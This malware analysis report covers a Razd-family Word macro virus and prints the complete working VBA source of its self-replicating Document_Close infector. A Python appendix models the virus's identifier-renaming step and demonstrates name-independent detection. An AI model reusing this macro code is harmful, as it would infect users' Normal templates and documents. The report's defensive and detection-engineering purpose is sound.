Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f1094904c5fa78c1…

MALICIOUS

Office (OLE)

Size: 27.0 KB
Created: 2001-05-03 16:42:00
Authoring application: Microsoft Word 9.0 (Word 2000)
First seen: 2012-06-14
MD5: 6abb0e53e552553afbc620a3d7a0c1cc
SHA-1: 8d9491a8fb73bc3725306819d6139d02a9fdbd4a
SHA-256: f1094904c5fa78c12f2498ec99e81de2e9bbcda75b89ec6ef57ca350b44f3178
Risk score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Razd-1. Static analysis revealed a VBA macro in the ThisDocument module. The extracted code is a self-replicating Word macro virus, not a downloader: a Document_Close handler checks whether the first line of the first code module in the first entry of Word.Templates (typically the global Normal template) and of the active document is the marker comment 'Razdego, and where it is not, deletes that module's contents and writes in a copy of its own code. Before each copy is written, the function kljuc replaces the three identifier names LKJASD, KODWER and JIDWER with random six-letter strings, so every generation differs at the byte level while keeping the same structure and the same marker line. The constant 1 is obtained as KODWER = KODWER + 1 on an undeclared (Empty) variable and as 2 - 1, which is light obfuscation rather than encoding of a payload. The script contains no network access, shell execution or second-stage download; its only observable effect is propagation through the Normal template into other documents. The 'Razdego marker and the ClamAV signature name point to the Razd macro-virus family.

Heuristics (2)

  • ClamAV: Doc.Trojan.Razd-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Razd-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  1798 bytes
SHA-256: 7dc30e1405e8eb393dd52be18c2f8a70c51499fee1c1cbd4ca3983ad651eba30
Detection
ClamAV: Doc.Trojan.Razd-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Razdego

Private Sub Document_Close()

KODWER = KODWER + 1

If Word.Templates(1).VBProject.VBComponents(1).CodeModule.Lines(KODWER, 2 - 1) <> "'Razdego" Then
    
     With Word.Templates(KODWER).VBProject.VBComponents(KODWER).CodeModule
     
        .DeleteLines KODWER, .CountOfLines
        
        .AddFromString kljuc(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(KODWER, _
ThisDocument.VBProject.VBComponents(KODWER).CodeModule.CountOfLines))

        
     End With
    
End If

If Word.ActiveDocument.VBProject.VBComponents(KODWER).CodeModule.Lines(KODWER, 2 - 1) <> "'Razdego" Then

    With Word.ActiveDocument.VBProject.VBComponents(KODWER).CodeModule
    
        .DeleteLines KODWER, .CountOfLines
        
        .AddFromString kljuc(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(KODWER, _
ThisDocument.VBProject.VBComponents(KODWER).CodeModule.CountOfLines))

        
    End With
    
End If

End Sub
Private Function kljuc(JIDWER)

Dim v(3)

v(1) = "LKJASD": v(2) = "KODWER": v(3) = "JIDWER"

For t = 1 To 3

Novi = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & _
Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65)

While InStr(1, JIDWER, v(t), vbTextCompare)

LKJASD = InStr(1, JIDWER, v(t), vbTextCompare)
    
JIDWER = Mid(JIDWER, 1, LKJASD - 1) & Novi & Mid(JIDWER, LKJASD + Len(v(t)), Len(JIDWER) - LKJASD)

Wend

Next

kljuc = JIDWER

End Function
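The following is an added example, not part of the report or of the oletools extraction it used. It ports the sample's kljuc() renaming engine to Python, generates successive infected generations from an abridged copy of the listing above, and shows that raw hashes change with every generation while a structural fingerprint and the object-model indicators (VBProject access, CodeModule writes, Templates(), the 'Razdego marker, the Document_Close auto-exec) stay fixed. The indicator names, the canonicalisation scheme and the collision guard in the port are this example's own choices; the VBA text is reconstructed from the report's listing with the second, ActiveDocument-targeting block and the Attribute header dropped.

```python
# Added example (not the report's code): model of the sample's self-renaming
# replication engine plus detection that survives it. Indicator names and the
# canonicalisation scheme are assumptions of this example.
import hashlib
import random
import re
import string

# Abridged from the report's listing (constructed test input for this example).
VBA_GEN0 = """\
'Razdego
Private Sub Document_Close()
KODWER = KODWER + 1
If Word.Templates(1).VBProject.VBComponents(1).CodeModule.Lines(KODWER, 2 - 1) <> "'Razdego" Then
 With Word.Templates(KODWER).VBProject.VBComponents(KODWER).CodeModule
  .DeleteLines KODWER, .CountOfLines
  .AddFromString kljuc(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(KODWER, _
ThisDocument.VBProject.VBComponents(KODWER).CodeModule.CountOfLines))
 End With
End If
End Sub
Private Function kljuc(JIDWER)
Dim v(3)
v(1) = "LKJASD": v(2) = "KODWER": v(3) = "JIDWER"
For t = 1 To 3
Novi = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & _
Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65)
While InStr(1, JIDWER, v(t), vbTextCompare)
LKJASD = InStr(1, JIDWER, v(t), vbTextCompare)
JIDWER = Mid(JIDWER, 1, LKJASD - 1) & Novi & Mid(JIDWER, LKJASD + Len(v(t)), Len(JIDWER) - LKJASD)
Wend
Next
kljuc = JIDWER
End Function
"""


def renamed_identifiers(src: str) -> list[str]:
    """Names the engine will rewrite, read from the v(1..3) literals. The previous
    generation renamed those literals too, so the list follows the lineage."""
    return re.findall(r'v\(\d\)\s*=\s*"([A-Z]{6})"', src)


def kljuc(src: str, rng: random.Random) -> str:
    """Port of kljuc(): replace each identifier case-insensitively with a fresh
    six-letter name from A..Y (Chr(Int(Rnd * 25) + 65)). The 'not already in
    the source' guard is an addition of this port; the VBA just trusts Rnd."""
    for old in renamed_identifiers(src):
        while True:
            new = "".join(rng.choice(string.ascii_uppercase[:25]) for _ in range(6))
            if new not in src.upper():
                break
        src = re.sub(old, new, src, flags=re.IGNORECASE)
    return src


def lineage(src: str, generations: int, seed: int = 1) -> list[str]:
    """Source of generation 0..N, as each infected module would be written."""
    rng = random.Random(seed)
    out = [src]
    for _ in range(generations):
        out.append(kljuc(out[-1], rng))
    return out


# Behaviour the renaming cannot touch: the engine rewrites only its own variable
# names, never the object-model calls or the marker it depends on.
INDICATORS = {
    "autoexec_document_close": r"\bSub\s+Document_Close\b",
    "vbproject_access": r"\.VBProject\b",
    "codemodule_write": r"\.(AddFromString|DeleteLines|InsertLines|ReplaceLine)\b",
    "global_template_target": r"\bTemplates\(",
    "infection_marker": r"'Razdego\b",
}


def indicators(src: str) -> list[str]:
    return sorted(n for n, p in INDICATORS.items() if re.search(p, src, re.IGNORECASE))


VBA_KEYWORDS = {"private", "sub", "function", "end", "if", "then", "with",
                "dim", "for", "to", "next", "while", "wend"}


def canonical_form(src: str) -> str:
    """Rename every non-keyword identifier to idN by order of first appearance,
    so the random names collapse to the same placeholders in every generation.
    Keywords are kept only for readability; correctness does not depend on the
    keyword list being complete."""
    names: dict[str, str] = {}

    def repl(m: re.Match) -> str:
        tok = m.group(0).lower()
        if tok in VBA_KEYWORDS:
            return tok
        return names.setdefault(tok, f"id{len(names)}")

    return re.sub(r"[A-Za-z]\w*", repl, src)


def canonical_hash(src: str) -> str:
    return hashlib.sha256(canonical_form(src).encode()).hexdigest()


def raw_hash(src: str) -> str:
    return hashlib.sha256(src.encode()).hexdigest()


if __name__ == "__main__":
    gens = lineage(VBA_GEN0, 2)
    print("names per generation:", [renamed_identifiers(g) for g in gens])
    print("distinct raw hashes:", len({raw_hash(g) for g in gens}))
    print("distinct canonical hashes:", len({canonical_hash(g) for g in gens}))
    print("indicators:", indicators(gens[-1]))
```

The point for detection engineering: a hash or string signature on the variable names (LKJASD, KODWER, JIDWER) matches only the generation that was submitted, whereas the indicator set and the canonical hash match every descendant, which is why the ClamAV detection and any in-house rule should key on the VBProject/CodeModule access and the 'Razdego marker rather than on the identifiers.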